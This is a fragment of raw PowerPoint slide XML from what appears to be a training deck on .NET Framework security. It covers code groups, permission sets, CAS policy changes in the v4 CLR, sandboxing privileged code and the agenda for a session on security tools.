              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Specify Membership Condition</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="495618" name="Picture 2" descr="http://assets.devx.com/articlefigs/10148.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2146365" y="982824"/>
            <a:ext cx="4562475" cy="4448175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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 a permission set</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="497666" name="Picture 2" descr="http://assets.devx.com/articlefigs/10149.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2202349" y="1169437"/>
            <a:ext cx="4562475" cy="4448175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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Naming the permission set</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="499714" name="Picture 2" descr="http://assets.devx.com/articlefigs/10150.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2165026" y="1449355"/>
            <a:ext cx="4562475" cy="4448175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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 permission sets</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="500738" name="Picture 2" descr="http://assets.devx.com/articlefigs/10151.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2444943" y="1449355"/>
            <a:ext cx="4562475" cy="4448175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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File I/O permissions</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="501762" name="Picture 2" descr="http://assets.devx.com/articlefigs/10152.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2911474" y="1491342"/>
            <a:ext cx="3752850" cy="3971925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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Completing Code Group Creation</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="502786" name="Picture 2" descr="http://assets.devx.com/articlefigs/10153.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2351639" y="1393371"/>
            <a:ext cx="4562475" cy="4448175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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Security Policy in the v4 CLR</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="856357"/>
            <a:ext cx="8915400" cy="5909310"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In previous releases of the .NET Framework, CAS policy applied to all assemblies loaded into an application </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the major areas that are seeing updates with the v4 CLR are:  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Security policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security transparency </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>APTCA (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>AllowPartiallyTrustedCallersAttribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Evidence </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>AppDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Managers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>http://blogs.msdn.com/shawnfa/archive/2009/05/20/net-4-0-security.aspx</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" sz="2000"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r>
              <a:rPr lang="en-GB"/>
              <a:t>Sandboxing Privileged Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206867" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3322638" y="2873375"/>
            <a:ext cx="2420937" cy="1846263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:alpha val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="25400" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="206868" name="Picture 20" descr="rectagle"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="633413" y="3114675"/>
            <a:ext cx="2143125" cy="1411288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206869" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="663575" y="3455988"/>
            <a:ext cx="1919288" cy="587375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="4763"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Partial Trust Web Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="206870" name="Picture 22" descr="rectagle"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3529013" y="3114675"/>
            <a:ext cx="2143125" cy="1438275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="206871" name="Picture 23" descr="rectagle"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7550150" y="3114675"/>
            <a:ext cx="1543050" cy="1411288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206872" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3578225" y="3562350"/>
            <a:ext cx="1919288" cy="339725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="4763"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wrapper Assembly </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206873" name="Text Box 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7554913" y="3448050"/>
            <a:ext cx="1403350" cy="587375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="4763"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secured Resource</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206874" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3360738" y="4867275"/>
            <a:ext cx="2365375" cy="668338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="folHlink"/>
          </a:solidFill>
          <a:ln w="25400" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="4763"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Sandboxed Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206875" name="Rectangle 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="342900" y="4883150"/>
            <a:ext cx="2603500" cy="641350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="folHlink"/>
          </a:solidFill>
          <a:ln w="25400" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="4763">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;trust level_”Medium”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="4763">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>originUri_--/&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206876" name="Text Box 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2089150" y="1195388"/>
            <a:ext cx="4881563" cy="1165225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="4763"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Permissions Demanded then Asserted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="4763"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>AllowPartiallyTrustedCallers attribute added</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="4763"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Assembly installed into the global assembly cache</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206877" name="Line 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3300413" y="2371725"/>
            <a:ext cx="2441575" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206878" name="Line 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4519613" y="2371725"/>
            <a:ext cx="0" cy="484188"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206879" name="Line 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1603375" y="4365625"/>
            <a:ext cx="0" cy="454025"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206880" name="Line 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2600325" y="3736975"/>
            <a:ext cx="960438" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206881" name="Line 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5481638" y="3736975"/>
            <a:ext cx="2063750" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206882" name="Text Box 34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5835650" y="3049588"/>
            <a:ext cx="1568450" cy="585787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="4763"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Resource Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206903" name="Line 55"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4543425" y="4375150"/>
            <a:ext cx="0" cy="454025"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-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2" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Agenda</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380933" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107950" y="914400"/>
            <a:ext cx="8915400" cy="5632311"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Available Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.NET Code Access Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>FxCop</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>CAT.NET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>NET Framework Security Features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Code Access Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Role-Based Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Cryptography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Securing ASP.NET Web Applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Securing ASP.NET Web Services</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 Types</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="228600" y="1117795"/>
          <a:ext cx="8915400" cy="5486400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4457700"/>
                <a:gridCol w="4457700"/>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr rtl="0"/>
                      <a:r>
                        <a:rPr lang="es-US" sz="2400" dirty="0" err="1"/>
                        <a:t>Evidence</a:t>
                      </a:r>
                      <a:endParaRPr lang="es-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr rtl="0"/>
                      <a:r>
                        <a:rPr lang="es-US" sz="2400"/>
                        <a:t>Description</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr rtl="0"/>
                      <a:r>
                        <a:rPr lang="es-US" sz="2400" dirty="0" err="1"/>
                        <a:t>Application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-US" sz="2400" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-US" sz="2400" dirty="0" err="1"/>
